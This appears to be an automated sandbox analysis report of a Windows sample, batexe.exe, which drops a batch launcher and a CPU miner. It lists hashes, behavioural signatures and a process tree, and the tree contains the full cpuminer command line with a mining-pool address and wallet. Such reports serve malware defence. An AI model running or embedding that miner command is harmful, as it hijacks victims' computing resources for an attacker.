Analysis
-
max time kernel
300s -
max time network
305s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
17-02-2024 08:43
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 4740 b2e.exe 2140 cpuminer-sse2.exe -
Loads dropped DLL 6 IoCs
pid Process 2140 cpuminer-sse2.exe 2140 cpuminer-sse2.exe 2140 cpuminer-sse2.exe 2140 cpuminer-sse2.exe 2140 cpuminer-sse2.exe 2140 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4072-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4072 wrote to memory of 4740 4072 batexe.exe 85 PID 4072 wrote to memory of 4740 4072 batexe.exe 85 PID 4072 wrote to memory of 4740 4072 batexe.exe 85 PID 4740 wrote to memory of 1692 4740 b2e.exe 86 PID 4740 wrote to memory of 1692 4740 b2e.exe 86 PID 4740 wrote to memory of 1692 4740 b2e.exe 86 PID 1692 wrote to memory of 2140 1692 cmd.exe 89 PID 1692 wrote to memory of 2140 1692 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Users\Admin\AppData\Local\Temp\69B2.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\69B2.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\69B2.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7635.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2140
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.3MB
MD52b2b67fa276762c09cc51bbaaa7ad5d4
SHA18dc0790875a0a5fa33833ef43d61fb9013e1d6f4
SHA2566367ea6af16d789f2e6f17a9de23bab5e1032606a6a9e04534971dde58ff405f
SHA5122cc163fc4750488e9e0987c8e4837499c73260d4b41dd34537282242e185e382c44811ce0700cd56c67ee756c96e047f956c836801db410e1154835954057c6c
-
Filesize
3.6MB
MD535148d204afedc81b1960bd17079414a
SHA1d46f552162ff318ab71e4c4273b96668712b3599
SHA2565192c7b6f4c17d3bb9c7a8e9e17ecad53ae4c9a0a466e6d04059a379cfce237b
SHA5127a2be17be5fe8fc8ed30d34107682334a8e7d53aa4517bd29628441ebe96d0f286c51385da6e25d3a9c039dfb4c94dae306d5fb18de50047dfdfe3376f54107a
-
Filesize
3.3MB
MD553512b3f36bdb3f75b13519b1b8a0f8c
SHA12dae9c50cb1ade95161b12dadfb4adbbc5cfdccd
SHA2569b085ebfa27b0aa4318a93f4da5845b4b0ae866bd6c191ba3040409788a0d7d6
SHA5125fd19869cfc26a2a67fab98d175ab8241537a69fa93844ce9740c10f765346680f599c23742210f000513ee48fa49547f4659d3b7cf67bbc8353244c6a966790
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.1MB
MD5686be3cb985ba71437b2f68b7bd81e48
SHA17e285d62c32cb8a5bd3a7ffbffd6bb68f9b57c02
SHA256b8eacfa871dd286422b7b1bd431a8cf51c9d43c5c6374fccceb96c9501c86670
SHA5126677ee8aedbf138b5ecb05da9104a0e5d81832d9d15a22fc7ee56540d86e937f300fd4b500c4e63470cc4a8b0e4c29f6bb9d15d083fe6b734ae37e2db6dfbe47
-
Filesize
1.1MB
MD5d3707009715c0bf38cc5ea13fd3ef5d4
SHA1a1dbe8c82278724e8f9a42b4ed3f9adb3f51c573
SHA256d7feec0698d5f16c302b33c984fd4eeaca2ef79cbcdae83d0f3bae4d752c0adb
SHA5126cf0ef5f4f2865e77576e37960b3b0f2274a5aea940e17fc124f9ff2346f92832b3c9b675f961b8d1233f75d443c281481d9fc0ca4dc10c3bf32abfaa7b34105
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD5340ea9a11585920f581cdaca2060a867
SHA13ed26fa79a965706b6eea84ad509d5d0d3e16d00
SHA25650f2cda8021d328cff20171c6366bd800203aabaaa45e39d3262fa1a2660c388
SHA5123739224b26f3d24b98bc7abb0bdc6150a1bb64ad4f7552f32cb566a9579c15e22efd367232e7dbfa85a64225f703db4fda48e809e0a4b180cd6aad18d56f8c6d
-
Filesize
939KB
MD52e5944a2330a0ce319352203fb2e98e3
SHA1035d3cab288e580bc361c50d742034357c9fd246
SHA256fd71c53e9b03c6ba1c8f49a164c78070345447641e7588a1b5eacd17a28c117d
SHA512da5a08be691364aad0eece415232d339da473837148b85da121f3c59a6144efba620b9c00ad0f17e02b6cdc3565ba6a613ca5eaf268c2392c447579ccd266c3f
-
Filesize
973KB
MD514b3ce7be84f19e5cfb7f8b615de9f4c
SHA15839fdb455a43a38b274ef2cf2338bc5ef482196
SHA256f73a7bea9dce268d47679b47ce76686069c0bd0610e5ab1034586706ed11103d
SHA51282b8d66dac4abd975997d98b588cb1ece63a43c6b05a519ef1225a117268fad5daeaafa3c583974826ec899d3cf15778f5b468f2647be15fa204f8b44b7869c6
-
Filesize
1.2MB
MD580eeb1a1f84a03ff0c5c15781c23a768
SHA1616b3e4b17491b33935e889308b0e76cb7ffd888
SHA2566505df6f7b71c8323b776ffa56074b597cbad6bd7d3fc7c228305d52af24f156
SHA512f87dc71f67f040e80a8c19855a8e0f6641a8b9cf999e237acbddeaf6ecf8f35358542d56b100834ad416081425be12ca0c84ee2ce14bad7c74fb67af0f8f943e
-
Filesize
1020KB
MD551c686a359c0bfaf49f6a92fbf798992
SHA1889feef496a781a0e4d982113300855d85feb8b1
SHA256c98e0388c62553a20eebfc75a9fe4677db2e165397e156c227f1aac0cbe70336
SHA5127befb5725270b13420704902d07dfde981b187dadf42f34a459fede2a6456e41cd8b39122bb8201b45ed303180a32cdd86d001769c3b52356b2d3c0f12587f85
-
Filesize
446KB
MD57b83ed1f0136978b0e6a595b09bab4bf
SHA1ca313585683111400fcbe40d81f76ebacd8dcc48
SHA256ff8bcdf7f82bf72c85c873cac5c62714ceae5fcf0d7640893de082bb94d3080a
SHA512acad87cd9cab8c845d100aa14174f176ae63307b8ff331a64e3bd22f5c3acb5a83cd0c7d7d26b00442722784abd843e0a14614e7949112c1c285674d4e85fe9e
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770